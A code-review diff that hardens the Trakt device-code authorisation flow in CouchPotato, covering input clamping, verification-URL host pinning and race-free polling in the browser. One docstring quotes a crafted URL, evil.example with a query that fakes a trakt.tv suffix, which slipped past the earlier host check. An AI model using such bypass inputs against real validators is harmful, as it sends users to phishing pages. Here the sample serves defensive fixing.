### PR TITLE
feat(trakt): a device authorisation control that can actually be finished (#311)

### DIFF
--- a/couchpotato/core/media/movie/providers/automation/trakt/__init__.py
+++ b/couchpotato/core/media/movie/providers/automation/trakt/__init__.py
@@ -36,7 +36,7 @@ config = [{
                     'type': 'password',
                     'label': 'Auth Token',
                     'advanced': True,
-                    'description': 'OAuth access token (set automatically after authorization).',
+                    'description': 'OAuth access token (set automatically after authorisation).',
                 },
                 {
                     'name': 'automation_oauth_refresh',

--- a/couchpotato/core/media/movie/providers/automation/trakt/main.py
+++ b/couchpotato/core/media/movie/providers/automation/trakt/main.py
@@ -124,7 +124,7 @@ class Trakt(Automation, TraktBase):
     applications. Users authenticate by:
     1. Creating a Trakt app at https://trakt.tv/oauth/applications
     2. Entering client_id and client_secret in CouchPotato settings
-    3. Clicking "Authorize" to start device code flow
+    3. Clicking "Start Trakt Authorisation" to start the device code flow
     4. Visiting trakt.tv/activate and entering the code shown
     5. CouchPotato polls for authorisation completion
     """
@@ -195,7 +195,7 @@ class Trakt(Automation, TraktBase):
                     self.conf('automation_oauth_refresh', value=data.get('refresh_token'))
                     Env.prop(prop_name, value=int(time.time()))
                 else:
-                    log.error('Failed refreshing Trakt token (HTTP %s), please re-authorize in settings', response.status_code)
+                    log.error('Failed refreshing Trakt token (HTTP %s), please re-authorise in settings', response.status_code)
 
             except Exception:
                 log.error('Failed refreshing Trakt token: %s', traceback.format_exc())
@@ -209,7 +209,7 @@ class Trakt(Automation, TraktBase):
             return movies
 
         if not self.conf('automation_oauth_token'):
-            log.warning('Trakt not authorized, skipping watchlist sync')
+            log.warning('Trakt not authorised, skipping watchlist sync')
             return movies
 
         for movie in self.getWatchlist():
@@ -246,14 +246,26 @@ class Trakt(Automation, TraktBase):
         """Start the device code authorisation flow.
 
         Returns a user_code and verification_url. The user must visit the URL
-        and enter the code to authorize CouchPotato.
+        and enter the code to authorise CouchPotato.
         """
         client_id = self.get_client_id()
+        client_secret = self.get_client_secret()
 
-        if not client_id:
+        # Both, not just the id. pollForToken needs the secret too, and the
+        # browser fires its first poll the instant a code arrives, so
+        # checking only the id here handed the user a code and then wiped it
+        # off the screen about a tenth of a second later, replaced by
+        # 'Client ID and Client Secret are required'. They were told to go
+        # and type a code that had already been thrown away. Refuse up front
+        # instead, and name the field rather than the pair.
+        if not client_id or not client_secret:
+            missing = 'Client ID' if not client_id else 'Client Secret'
             return {
                 'success': False,
-                'error': 'Please enter your Trakt Client ID first. Create an app at https://trakt.tv/oauth/applications',
+                'error': (
+                    'Please enter your Trakt %s first, in the fields above. '
+                    'Create an app at https://trakt.tv/oauth/applications to get both.'
+                ) % missing,
             }
 
         try:
@@ -310,7 +322,7 @@ class Trakt(Automation, TraktBase):
             }
 
     def pollForToken(self, **kwargs):
-        """Poll Trakt to check if the user has authorized the device code.
+        """Poll Trakt to check if the user has authorised the device code.
 
         Returns success when the user completes authorisation, or pending/error status.
         """
@@ -351,7 +363,7 @@ class Trakt(Automation, TraktBase):
             )
 
             if response.status_code == 200:
-                # Success! User authorized
+                # Success! User authorised
                 data = response.json()
                 self.conf('automation_oauth_token', value=data.get('access_token'))
                 self.conf('automation_oauth_refresh', value=data.get('refresh_token'))
@@ -365,7 +377,7 @@ class Trakt(Automation, TraktBase):
                 }
 
             elif response.status_code == 400:
-                # Pending - user hasn't authorized yet
+                # Pending - user has not authorised yet
                 return {
                     'success': False,
                     'pending': True,

--- a/couchpotato/core/media/movie/providers/automation/trakt/main.py
+++ b/couchpotato/core/media/movie/providers/automation/trakt/main.py
@@ -1,4 +1,5 @@
 import json
+import math
 import traceback
 import time
 
@@ -12,6 +13,60 @@ from couchpotato.environment import Env
 
 
 log = CPLog(__name__)
+
+
+# M1: bounds for the device-auth poll interval and code expiry Trakt hands
+# back. Both are relayed to the browser's poll loop and stored for the next
+# poll, and both were previously trusted unchecked -- an interval of -1 or
+# 1e9 (which overflows setTimeout's 32-bit millisecond limit and so fires
+# immediately) drove hundreds of poll requests in a few seconds, each one
+# taking a per-route lock and a blocking 30s outbound call from the server's
+# thread pool. Interval bounds mirror Trakt's own documented range; expiry
+# bounds keep a legitimate-looking but absurd value from either expiring the
+# flow instantly or leaving stale device-code state around for a day.
+MIN_POLL_INTERVAL_SECONDS = 5
+MAX_POLL_INTERVAL_SECONDS = 60
+DEFAULT_POLL_INTERVAL_SECONDS = 5
+
+MIN_DEVICE_EXPIRY_SECONDS = 60
+MAX_DEVICE_EXPIRY_SECONDS = 1800
+DEFAULT_DEVICE_EXPIRY_SECONDS = 600
+
+# H2: verification_url is bound as an href in trakt_auth.html (`:href`). The
+# vendored Alpine does no scheme filtering on x-bind and there is no CSP, so
+# anything other than a genuine https:// URL is clickable script or local
+# file access if a response is ever forged or intercepted.
+DEFAULT_VERIFICATION_URL = 'https://trakt.tv/activate'
+
+
+def _clamp_seconds(value, low, high, default):
+    """Coerce an untrusted numeric field into `[low, high]`, falling back to
+    `default` for anything that is not a genuine, finite number: missing,
+    non-numeric, boolean (a Python bool is an int subclass, so `True` would
+    otherwise sail through as 1), NaN or infinite.
+
+    A value inside the bound the wire actually offered is clamped to the
+    nearer edge rather than forced to `default`, since that is still a
+    number Trakt asked for -- only the shape of the value, not its size,
+    decides whether it gets a default instead of a clamp.
+    """
+    if isinstance(value, bool):
+        return default
+    try:
+        number = float(value)
+    except (TypeError, ValueError):
+        return default
+    if not math.isfinite(number):
+        return default
+    return int(min(max(number, low), high))
+
+
+def _safe_verification_url(url):
+    """Refuse anything that is not an https:// URL, falling back to the
+    documented device-auth activation page."""
+    if isinstance(url, str) and url.startswith('https://'):
+        return url
+    return DEFAULT_VERIFICATION_URL
 
 
 class TraktBase(Provider):
@@ -206,17 +261,33 @@ class Trakt(Automation, TraktBase):
 
             if response.status_code == 200:
                 data = response.json()
+                # H2/M1: none of these are trustworthy as-is -- clamp the
+                # numeric fields and validate the URL scheme before either
+                # storing them for the next poll or handing them to the
+                # browser.
+                interval = _clamp_seconds(
+                    data.get('interval'),
+                    MIN_POLL_INTERVAL_SECONDS, MAX_POLL_INTERVAL_SECONDS,
+                    DEFAULT_POLL_INTERVAL_SECONDS,
+                )
+                expires_in = _clamp_seconds(
+                    data.get('expires_in'),
+                    MIN_DEVICE_EXPIRY_SECONDS, MAX_DEVICE_EXPIRY_SECONDS,
+                    DEFAULT_DEVICE_EXPIRY_SECONDS,
+                )
+                verification_url = _safe_verification_url(data.get('verification_url'))
+
                 # Store device code for polling
                 self._device_code = data.get('device_code')
-                self._device_expires = time.time() + data.get('expires_in', 600)
-                self._poll_interval = data.get('interval', 5)
+                self._device_expires = time.time() + expires_in
+                self._poll_interval = interval
 
                 return {
                     'success': True,
                     'user_code': data.get('user_code'),
-                    'verification_url': data.get('verification_url'),
-                    'expires_in': data.get('expires_in'),
-                    'interval': data.get('interval'),
+                    'verification_url': verification_url,
+                    'expires_in': expires_in,
+                    'interval': interval,
                 }
             else:
                 log.error('Failed to get device code: HTTP %s - %s', response.status_code, response.text)
@@ -311,8 +382,14 @@ class Trakt(Automation, TraktBase):
                 return {'success': False, 'error': 'Authorization denied by user.'}
 
             elif response.status_code == 429:
-                # Slow down
-                self._poll_interval = min(self._poll_interval * 2, 30)
+                # Slow down. Same clamp as startDeviceAuth: doubling an
+                # already-stored interval must not walk it past the same
+                # ceiling a hostile initial value was bounded to.
+                self._poll_interval = _clamp_seconds(
+                    self._poll_interval * 2,
+                    MIN_POLL_INTERVAL_SECONDS, MAX_POLL_INTERVAL_SECONDS,
+                    DEFAULT_POLL_INTERVAL_SECONDS,
+                )
                 return {
                     'success': False,
                     'pending': True,

--- a/couchpotato/core/media/movie/providers/automation/trakt/main.py
+++ b/couchpotato/core/media/movie/providers/automation/trakt/main.py
@@ -2,6 +2,7 @@ import json
 import math
 import traceback
 import time
+from urllib.parse import urlsplit
 
 from couchpotato.api import addApiView
 from couchpotato.core.event import addEvent, fireEvent
@@ -77,11 +78,40 @@ def _safe_verification_url(url):
     trakt.tv/activate, and the user would type a real device code into it.
     The host is knowable and fixed, so pin it. This is the page we send people
     to; there is no legitimate reason for it to live anywhere else.
+
+    Parsed with `urlsplit`, not by hand. The hand-rolled version split on '/'
+    to drop the path, which does nothing when there is no '/' before a query
+    or fragment, so `https://evil.example?x=fake.trakt.tv` computed a "host"
+    of `evil.example?x=fake.trakt.tv`, which genuinely ends in `.trakt.tv`,
+    and was returned unchanged. The browser would have navigated to
+    evil.example. Reproduced before fixing. A real parser also handles
+    userinfo, port, fragment and case correctly, none of which is worth
+    re-deriving here, and getting one of them wrong is what happened.
     """
-    if not isinstance(url, str) or not url.startswith('https://'):
+    if not isinstance(url, str):
         return DEFAULT_VERIFICATION_URL
 
-    host = url[len('https://'):].split('/', 1)[0].split('@')[-1].split(':')[0].lower()
+    try:
+        parts = urlsplit(url)
+        host = (parts.hostname or '').lower()
+        # Bound, not merely touched: `.port` is the accessor that validates
+        # the port, and it raises here rather than returning. A bare
+        # `parts.port` statement reads as dead code and gets tidied away,
+        # which would silently remove this check. An out-of-range port makes
+        # a link the browser cannot follow; the host may be genuinely
+        # Trakt's, so this is not about phishing, it is that sending someone
+        # to a URL that cannot resolve is worse than the documented page.
+        validated_port = parts.port
+    except ValueError:
+        return DEFAULT_VERIFICATION_URL
+
+    if parts.scheme != 'https':
+        return DEFAULT_VERIFICATION_URL
+
+    if validated_port is not None and validated_port not in (443, 80):
+        # A Trakt link on an unexpected port is not a link we published.
+        return DEFAULT_VERIFICATION_URL
+
     if host == 'trakt.tv' or host.endswith('.trakt.tv'):
         return url
     return DEFAULT_VERIFICATION_URL

--- a/couchpotato/core/media/movie/providers/automation/trakt/main.py
+++ b/couchpotato/core/media/movie/providers/automation/trakt/main.py
@@ -54,7 +54,13 @@ def _clamp_seconds(value, low, high, default):
         return default
     try:
         number = float(value)
-    except (TypeError, ValueError):
+    except (TypeError, ValueError, OverflowError):
+        # OverflowError is reachable from the wire, not theoretical: json.loads
+        # builds an arbitrary-precision int for a long integer literal, and
+        # float() raises on one too large to convert. Without it here the
+        # method's outer `except Exception` caught it instead, which failed
+        # closed but contradicted this function's promise to return `default`
+        # for anything that is not a finite number.
         return default
     if not math.isfinite(number):
         return default
@@ -120,7 +126,7 @@ class Trakt(Automation, TraktBase):
     2. Entering client_id and client_secret in CouchPotato settings
     3. Clicking "Authorize" to start device code flow
     4. Visiting trakt.tv/activate and entering the code shown
-    5. CouchPotato polls for authorization completion
+    5. CouchPotato polls for authorisation completion
     """
 
     urls = {
@@ -233,11 +239,11 @@ class Trakt(Automation, TraktBase):
         return {
             'success': False,
             'error': 'OAuth proxy is no longer available. Use the device code flow instead.',
-            'message': 'Click "Start Authorization" to begin the device code authentication flow.',
+            'message': 'Click "Start Authorisation" to begin the device code authentication flow.',
         }
 
     def startDeviceAuth(self, **kwargs):
-        """Start the device code authorization flow.
+        """Start the device code authorisation flow.
 
         Returns a user_code and verification_url. The user must visit the URL
         and enter the code to authorize CouchPotato.
@@ -306,7 +312,7 @@ class Trakt(Automation, TraktBase):
     def pollForToken(self, **kwargs):
         """Poll Trakt to check if the user has authorized the device code.
 
-        Returns success when the user completes authorization, or pending/error status.
+        Returns success when the user completes authorisation, or pending/error status.
         """
         client_id = self.get_client_id()
         client_secret = self.get_client_secret()
@@ -320,14 +326,14 @@ class Trakt(Automation, TraktBase):
         if not self._device_code:
             return {
                 'success': False,
-                'error': 'No device code. Start authorization first.',
+                'error': 'No device code. Start authorisation first.',
             }
 
         if time.time() > self._device_expires:
             self._device_code = None
             return {
                 'success': False,
-                'error': 'Device code expired. Please start authorization again.',
+                'error': 'Device code expired. Please start authorisation again.',
                 'expired': True,
             }
 
@@ -352,10 +358,10 @@ class Trakt(Automation, TraktBase):
                 Env.prop('last_trakt_refresh', value=int(time.time()))
                 self._device_code = None
 
-                log.info('Trakt authorization successful')
+                log.info('Trakt authorisation successful')
                 return {
                     'success': True,
-                    'message': 'Authorization successful! Trakt is now connected.',
+                    'message': 'Authorisation successful! Trakt is now connected.',
                 }
 
             elif response.status_code == 400:
@@ -368,18 +374,18 @@ class Trakt(Automation, TraktBase):
 
             elif response.status_code == 404:
                 self._device_code = None
-                return {'success': False, 'error': 'Invalid device code. Please restart authorization.'}
+                return {'success': False, 'error': 'Invalid device code. Please restart authorisation.'}
 
             elif response.status_code == 409:
                 return {'success': False, 'error': 'Code already approved. Refresh the page.'}
 
             elif response.status_code == 410:
                 self._device_code = None
-                return {'success': False, 'error': 'Code expired. Please restart authorization.', 'expired': True}
+                return {'success': False, 'error': 'Code expired. Please restart authorisation.', 'expired': True}
 
             elif response.status_code == 418:
                 self._device_code = None
-                return {'success': False, 'error': 'Authorization denied by user.'}
+                return {'success': False, 'error': 'Authorisation denied by user.'}
 
             elif response.status_code == 429:
                 # Slow down. Same clamp as startDeviceAuth: doubling an

--- a/couchpotato/core/media/movie/providers/automation/trakt/main.py
+++ b/couchpotato/core/media/movie/providers/automation/trakt/main.py
@@ -68,9 +68,21 @@ def _clamp_seconds(value, low, high, default):
 
 
 def _safe_verification_url(url):
-    """Refuse anything that is not an https:// URL, falling back to the
-    documented device-auth activation page."""
-    if isinstance(url, str) and url.startswith('https://'):
+    """Refuse anything that is not an https:// URL on Trakt's own host,
+    falling back to the documented device-auth activation page.
+
+    The scheme check alone stops a forged response becoming clickable script.
+    It does not stop it becoming a phishing page: an attacker who can forge
+    this field could point it at their own https:// site dressed as
+    trakt.tv/activate, and the user would type a real device code into it.
+    The host is knowable and fixed, so pin it. This is the page we send people
+    to; there is no legitimate reason for it to live anywhere else.
+    """
+    if not isinstance(url, str) or not url.startswith('https://'):
+        return DEFAULT_VERIFICATION_URL
+
+    host = url[len('https://'):].split('/', 1)[0].split('@')[-1].split(':')[0].lower()
+    if host == 'trakt.tv' or host.endswith('.trakt.tv'):
         return url
     return DEFAULT_VERIFICATION_URL
 
@@ -295,6 +307,15 @@ class Trakt(Automation, TraktBase):
                 )
                 verification_url = _safe_verification_url(data.get('verification_url'))
 
+                # user_code goes to the DOM through x-text, which sets
+                # textContent, so there is no injection path. It is coerced
+                # anyway: every other field off this response is validated,
+                # and a non-string here would reach the template as whatever
+                # json gave us. Cheaper to be uniform than to leave one field
+                # explained only by a comment nobody reads.
+                user_code = data.get('user_code')
+                user_code = user_code if isinstance(user_code, str) else ''
+
                 # Store device code for polling
                 self._device_code = data.get('device_code')
                 self._device_expires = time.time() + expires_in
@@ -302,7 +323,7 @@ class Trakt(Automation, TraktBase):
 
                 return {
                     'success': True,
-                    'user_code': data.get('user_code'),
+                    'user_code': user_code,
                     'verification_url': verification_url,
                     'expires_in': expires_in,
                     'interval': interval,

--- a/couchpotato/core/notifications/trakt.py
+++ b/couchpotato/core/notifications/trakt.py
@@ -63,7 +63,7 @@ class Trakt(Notification, TraktBase):
                 log.warning('Trakt Client ID not configured in automation settings')
                 return False
             if not self.conf('automation_oauth_token'):
-                log.warning('Trakt not authorized. Authorize in the Automation tab first.')
+                log.warning('Trakt not authorised. Authorise it under Settings, Suggestions tab, Trakt.')
                 return False
 
             result = self.call(self.urls['test'])

--- a/couchpotato/ui/templates/partials/settings/provider_card.html
+++ b/couchpotato/ui/templates/partials/settings/provider_card.html
@@ -53,6 +53,9 @@
 
     <!-- Test button for providers -->
     {% include "partials/settings/test_button.html" %}
+
+    <!-- Trakt device authorisation (issue #311) -->
+    {% include "partials/settings/trakt_auth.html" %}
   </div>
 </div>
 </template>

--- a/couchpotato/ui/templates/partials/settings/scripts.html
+++ b/couchpotato/ui/templates/partials/settings/scripts.html
@@ -828,6 +828,16 @@ function traktDeviceAuth() {
       }
     },
 
+    // Alpine 3 calls destroy() when the element is removed (e.g. switching
+    // settings tabs, which re-keys currentGroups' x-for and drops this
+    // group out of it); without it the pending setTimeout in poll() keeps
+    // firing on a detached scope, so a second "Start Authorisation" click
+    // after returning races the orphaned chain instead of finding it gone.
+    destroy() {
+      this.clearPoll();
+      this.polling = false;
+    },
+
     getPanel() {
       let el = this.$el;
       while (el && !el.__x_panel) el = el.parentElement;

--- a/couchpotato/ui/templates/partials/settings/scripts.html
+++ b/couchpotato/ui/templates/partials/settings/scripts.html
@@ -110,6 +110,7 @@ function settingsPanel() {
     currentGroups: [],
     lastSaved: false,
     saveTimers: {},
+    pendingSaves: {},
     version: '',
     updateAvailable: null,
 
@@ -417,10 +418,37 @@ function settingsPanel() {
     debounceSave(section, name, value) {
       const key = section + '.' + name;
       if (this.saveTimers[key]) clearTimeout(this.saveTimers[key]);
+      this.pendingSaves[key] = { section, name, value };
       this.saveTimers[key] = setTimeout(() => this.saveSingle(section, name, value), 500);
     },
 
+    /**
+     * Run every debounced save NOW and wait for all of them.
+     *
+     * For a control that acts on a setting the user has only just typed. The
+     * 500ms debounce is right for keystrokes and wrong the moment something
+     * READS the saved value: Trakt authorisation asked the server for a
+     * device code using whichever credentials the server had before the edit
+     * had landed, which on first setup is none of them.
+     *
+     * Safe to call when nothing is pending: it resolves immediately.
+     */
+    async flushPendingSaves() {
+      const pending = Object.entries(this.pendingSaves);
+      if (!pending.length) return;
+
+      this.pendingSaves = {};
+      await Promise.all(pending.map(([key, s]) => {
+        if (this.saveTimers[key]) {
+          clearTimeout(this.saveTimers[key]);
+          delete this.saveTimers[key];
+        }
+        return this.saveSingle(s.section, s.name, s.value);
+      }));
+    },
+
     async saveSingle(section, name, value) {
+      delete this.pendingSaves[section + '.' + name];
       this.saving = true;
       this.lastSaved = false;
       try {
@@ -744,6 +772,19 @@ function traktDeviceAuth() {
       // (aria-disabled, not disabled) while a request or a poll is live.
       if (this.authorising || this.polling) return;
 
+      // Credentials are written through setVal(), which debounces the save by
+      // 500ms. Clicking Start straight after typing a Client ID or Secret,
+      // which is exactly what someone setting this up does, would otherwise
+      // ask Trakt for a code using whatever the server had BEFORE the edit:
+      // reported as missing when it is visibly on screen, or worse, a code
+      // issued for the old client and polled for with the new one. Flush
+      // first, and wait for it.
+      const panel = this.getPanel();
+      if (panel && typeof panel.flushPendingSaves === 'function') {
+        await panel.flushPendingSaves();
+        if (this.destroyed) return;
+      }
+
       this.clearPoll();
       this.authorising = true;
       this.error = false;
@@ -769,7 +810,15 @@ function traktDeviceAuth() {
           this.statusText = 'Waiting for authorisation…';
           this.statusClass = 'text-cp-muted';
           this.polling = true;
-          this.poll(Number(data.interval) || 5);
+          // Wait the interval before the FIRST poll too. Trakt's interval is
+          // the minimum gap between token requests, and the user cannot
+          // possibly have typed a code that appeared a moment ago, so an
+          // immediate poll is guaranteed to be wasted. Worse than wasted: it
+          // can draw the 429 slow-down, which doubles the interval for every
+          // later poll, so the one request that could never succeed makes the
+          // rest of the flow slower.
+          const firstDelay = Number(data.interval) || 5;
+          this.pollTimer = setTimeout(() => this.poll(firstDelay), firstDelay * 1000);
         } else {
           this.showError(data.error || 'Failed to start authorisation.');
         }

--- a/couchpotato/ui/templates/partials/settings/scripts.html
+++ b/couchpotato/ui/templates/partials/settings/scripts.html
@@ -772,6 +772,17 @@ function traktDeviceAuth() {
       // (aria-disabled, not disabled) while a request or a poll is live.
       if (this.authorising || this.polling) return;
 
+      // Claim the flag SYNCHRONOUSLY, before any await. Setting it after the
+      // flush below left a window where the guard above was a no-op across a
+      // real network round trip: a double click, which is an ordinary thing
+      // to do and exactly the case the flush exists for, put two runs on the
+      // same component instance, each overwriting userCode and pollTimer and
+      // orphaning whichever poll loop lost the race. That is the two
+      // concurrent loops this whole control was fixed for, reintroduced one
+      // step earlier in the same function. A guard that only takes effect
+      // after an await does not guard the await.
+      this.authorising = true;
+
       // Credentials are written through setVal(), which debounces the save by
       // 500ms. Clicking Start straight after typing a Client ID or Secret,
       // which is exactly what someone setting this up does, would otherwise
@@ -782,11 +793,13 @@ function traktDeviceAuth() {
       const panel = this.getPanel();
       if (panel && typeof panel.flushPendingSaves === 'function') {
         await panel.flushPendingSaves();
-        if (this.destroyed) return;
+        if (this.destroyed) {
+          this.authorising = false;
+          return;
+        }
       }
 
       this.clearPoll();
-      this.authorising = true;
       this.error = false;
       this.userCode = '';
       this.verificationUrl = '';

--- a/couchpotato/ui/templates/partials/settings/scripts.html
+++ b/couchpotato/ui/templates/partials/settings/scripts.html
@@ -748,73 +748,130 @@ function buttonField(section, opt) {
    single-shot (fetch once, show a message, refresh the panel), and this
    flow needs a start call followed by a bounded poll loop with its own
    expiry and a "still waiting" state in between, which buttonField cannot
-   express without turning it into something else entirely. */
+   express without turning it into something else entirely.
+
+   STRUCTURE, and why it is worth reading before editing this.
+
+   Everything that went wrong with this control was one problem wearing
+   different clothes: work continuing across an `await` or a `setTimeout`
+   after the thing that started it was gone or superseded. It arrived four
+   times, found by four different reviewers, and the fourth was introduced
+   while fixing the third:
+
+     - a poll loop outliving the settings tab that started it, so the user
+       was told authorisation failed at the moment it succeeded;
+     - a request already in flight resuming after teardown and restarting
+       the chain teardown had just stopped;
+     - a panel refresh timer nothing could cancel;
+     - a re-entry flag claimed after an await, so a double click ran two
+       flows at once.
+
+   Guarding each one separately meant five pieces of state (`authorising`,
+   `polling`, `destroyed`, and two timer handles) each having to be correct
+   at six different suspension points. That is about thirty places to get
+   right, and a review found a new wrong one every round.
+
+   So there is now ONE invariant instead of five. A "run" is the unit of
+   work from a Start click to its terminal state, and exactly one can be
+   live. Every continuation asks the same single question -- am I still the
+   live run? -- through `isCurrent(run)`, and every timer is created through
+   `later(run, ...)`, which will not fire for a run that is over. Cancelling
+   a run invalidates its token and drops its timers in one place.
+
+   The practical rule for anyone editing this: after any `await`, the first
+   statement must be the `isCurrent(run)` check, and no `setTimeout` should
+   appear in this component except through `later()`. Both are mechanical
+   and both are visible in review, which the old arrangement was not.
+
+   `authorising` and `polling` survive, but ONLY as display state for the
+   button's label and its aria-disabled. They are no longer load-bearing for
+   correctness, which is why nothing branches on them after an await. */
 function traktDeviceAuth() {
   return {
+    // Display state. Read by the template, never trusted for correctness.
     authorising: false,
     polling: false,
     userCode: '',
     verificationUrl: '',
     statusText: '',
     statusClass: 'text-cp-muted',
-    error: false,
+
+    // The single correctness invariant. Bumped when a run starts and when
+    // one is cancelled, so any continuation holding an older token is, by
+    // definition, no longer the live run.
+    runId: 0,
     expiresAt: 0,
-    pollTimer: null,
-    // Set once by destroy(). Clearing pollTimer only cancels a poll that
-    // has not started yet; a fetch already in flight still resolves on a
-    // torn-down component and schedules the next one, which restarts the
-    // chain destroy() just stopped. Every await below re-checks this.
-    destroyed: false,
-    reinitTimer: null,
+
+    /** True while `run` is still the live run. The only question any
+     *  continuation in this component needs to ask. */
+    isCurrent(run) {
+      return run === this.runId;
+    },
+
+    /** setTimeout owned by a run: fires only while that run is still live.
+     *
+     *  Deliberately NOT paired with a timer registry and clearTimeout. An
+     *  earlier draft had both, and a mutation showed the second one was
+     *  unreachable: cancelling a run cleared its timers, so the check here
+     *  could never be the thing that saved you, and no test could tell
+     *  whether it worked. Two mechanisms where one is unprovable is the
+     *  problem this restructure exists to remove, so there is one.
+     *
+     *  The cost is a single pending no-op timer per cancelled run, which
+     *  fires once, finds its run superseded and does nothing. It does not
+     *  reschedule, because the callback it would have called is what
+     *  reschedules. */
+    later(run, fn, ms) {
+      setTimeout(() => {
+        if (this.isCurrent(run)) fn();
+      }, ms);
+    },
+
+    /** End whatever run is live by invalidating its token, so every
+     *  continuation and every pending timer belonging to it becomes a no-op
+     *  the moment it resumes or fires. */
+    cancelRun() {
+      this.runId++;
+      this.authorising = false;
+      this.polling = false;
+    },
 
     async start() {
-      // Re-entry guard, since the button stays focusable/clickable
-      // (aria-disabled, not disabled) while a request or a poll is live.
+      // Re-entry guard. The button stays focusable and clickable
+      // (aria-disabled, not disabled), so a second click is an ordinary
+      // thing for a user to do and must not start a second run.
       if (this.authorising || this.polling) return;
 
-      // Claim the flag SYNCHRONOUSLY, before any await. Setting it after the
-      // flush below left a window where the guard above was a no-op across a
-      // real network round trip: a double click, which is an ordinary thing
-      // to do and exactly the case the flush exists for, put two runs on the
-      // same component instance, each overwriting userCode and pollTimer and
-      // orphaning whichever poll loop lost the race. That is the two
-      // concurrent loops this whole control was fixed for, reintroduced one
-      // step earlier in the same function. A guard that only takes effect
-      // after an await does not guard the await.
+      // Claim the run SYNCHRONOUSLY, before any await, or the guard above is
+      // a no-op for the duration of the first suspension.
+      this.cancelRun();
+      const run = this.runId;
       this.authorising = true;
-
-      // Credentials are written through setVal(), which debounces the save by
-      // 500ms. Clicking Start straight after typing a Client ID or Secret,
-      // which is exactly what someone setting this up does, would otherwise
-      // ask Trakt for a code using whatever the server had BEFORE the edit:
-      // reported as missing when it is visibly on screen, or worse, a code
-      // issued for the old client and polled for with the new one. Flush
-      // first, and wait for it.
-      const panel = this.getPanel();
-      if (panel && typeof panel.flushPendingSaves === 'function') {
-        await panel.flushPendingSaves();
-        if (this.destroyed) {
-          this.authorising = false;
-          return;
-        }
-      }
-
-      this.clearPoll();
-      this.error = false;
       this.userCode = '';
       this.verificationUrl = '';
       // Announce the busy state rather than clearing the region. The button's
-      // own label changes to "Starting", but that is only read if focus
-      // happens to be on the button; the live region is the programmatic
-      // equivalent WCAG 4.1.3 asks for. The window is not trivial: the server
-      // handler allows a 30s timeout against Trakt, so this can be seconds.
+      // label also changes, but that is only read if focus happens to be on
+      // it. The window is not trivial: the server allows a 30s timeout
+      // against Trakt, so this can be seconds. (WCAG 4.1.3)
       this.statusText = 'Contacting Trakt…';
       this.statusClass = 'text-cp-muted';
+
+      // Credentials are written through setVal(), which debounces the save by
+      // 500ms. Clicking Start straight after typing a Client ID or Secret,
+      // which is what someone setting this up does, would otherwise ask Trakt
+      // for a code using whatever the server held BEFORE the edit: reported
+      // as missing while visibly on screen, or worse, a code issued for the
+      // old client and polled for with the new one.
+      const panel = this.getPanel();
+      if (panel && typeof panel.flushPendingSaves === 'function') {
+        await panel.flushPendingSaves();
+        if (!this.isCurrent(run)) return;
+      }
 
       try {
         const resp = await fetch(CP.apiBase + '/automation.trakt.device_code/');
         const data = await resp.json();
-        if (this.destroyed) return;
+        if (!this.isCurrent(run)) return;
 
         if (data.success) {
           this.userCode = data.user_code || '';
@@ -822,120 +879,90 @@ function traktDeviceAuth() {
           this.expiresAt = Date.now() + (Number(data.expires_in) || 600) * 1000;
           this.statusText = 'Waiting for authorisation…';
           this.statusClass = 'text-cp-muted';
+          this.authorising = false;
           this.polling = true;
           // Wait the interval before the FIRST poll too. Trakt's interval is
-          // the minimum gap between token requests, and the user cannot
-          // possibly have typed a code that appeared a moment ago, so an
-          // immediate poll is guaranteed to be wasted. Worse than wasted: it
-          // can draw the 429 slow-down, which doubles the interval for every
-          // later poll, so the one request that could never succeed makes the
-          // rest of the flow slower.
-          const firstDelay = Number(data.interval) || 5;
-          this.pollTimer = setTimeout(() => this.poll(firstDelay), firstDelay * 1000);
-        } else {
-          this.showError(data.error || 'Failed to start authorisation.');
+          // the minimum gap between token requests, and the user cannot have
+          // typed a code that appeared a moment ago, so an immediate poll is
+          // guaranteed to be wasted. Worse than wasted: it can draw the 429
+          // slow-down, which doubles the interval for every later poll.
+          const first = Number(data.interval) || 5;
+          this.later(run, () => this.poll(run, first), first * 1000);
+          return;
         }
-      } catch (e) {
-        // A rejected fetch resumes here from an await too, so this path
-        // needs the same check as the resolve paths. Harmless while
-        // showError only writes reactive state, but showSuccess already
-        // schedules a timer, and the comment on `destroyed` promises every
-        // await re-checks. Making that true is cheaper than a comment the
-        // next person has to disbelieve.
-        if (this.destroyed) return;
-        this.showError('Request failed: ' + e.message);
-      }
 
-      this.authorising = false;
+        this.finish(run, data.error || 'Failed to start authorisation.', false);
+      } catch (e) {
+        if (!this.isCurrent(run)) return;
+        this.finish(run, 'Request failed: ' + e.message, false);
+      }
     },
 
-    async poll(intervalSeconds) {
-      if (this.destroyed) return;
+    async poll(run, intervalSeconds) {
+      if (!this.isCurrent(run)) return;
+
       if (Date.now() > this.expiresAt) {
-        this.showError('Authorisation code expired. Please start again.');
+        this.finish(run, 'Authorisation code expired. Please start again.', false);
         return;
       }
 
       try {
         const resp = await fetch(CP.apiBase + '/automation.trakt.poll_token/');
         const data = await resp.json();
-        if (this.destroyed) return;
+        if (!this.isCurrent(run)) return;
 
         if (data.success) {
-          this.showSuccess(data.message || 'Authorisation successful.');
+          this.finish(run, data.message || 'Authorisation successful.', true);
           return;
         }
 
         if (data.pending) {
           const next = Number(data.interval) || intervalSeconds;
-          this.pollTimer = setTimeout(() => this.poll(next), next * 1000);
+          this.later(run, () => this.poll(run, next), next * 1000);
           return;
         }
 
         // Any non-pending, non-success response is terminal (expired,
         // invalid code, denied, unexpected status): stop and report it.
-        this.showError(data.error || 'Authorisation failed.');
+        this.finish(run, data.error || 'Authorisation failed.', false);
       } catch (e) {
-        // A rejected fetch resumes here from an await too, so this path
-        // needs the same check as the resolve paths. Harmless while
-        // showError only writes reactive state, but showSuccess already
-        // schedules a timer, and the comment on `destroyed` promises every
-        // await re-checks. Making that true is cheaper than a comment the
-        // next person has to disbelieve.
-        if (this.destroyed) return;
-        this.showError('Request failed: ' + e.message);
+        if (!this.isCurrent(run)) return;
+        this.finish(run, 'Request failed: ' + e.message, false);
       }
     },
 
-    showSuccess(message) {
-      this.clearPoll();
-      this.polling = false;
+    /** The one terminal path, success or failure. Ends the run first, so no
+     *  timer or in-flight request from it can act afterwards, then paints
+     *  the outcome. */
+    finish(run, message, ok) {
+      if (!this.isCurrent(run)) return;
+
+      this.cancelRun();
+      const ended = this.runId;
+
       this.userCode = '';
       this.verificationUrl = '';
       this.statusText = message;
-      this.statusClass = 'text-cp-success';
+      this.statusClass = ok ? 'text-cp-success' : 'text-cp-danger';
 
-      // Same re-init approach as buttonField.execute() above, so the now
-      // populated token fields (password inputs, rendered from `values`)
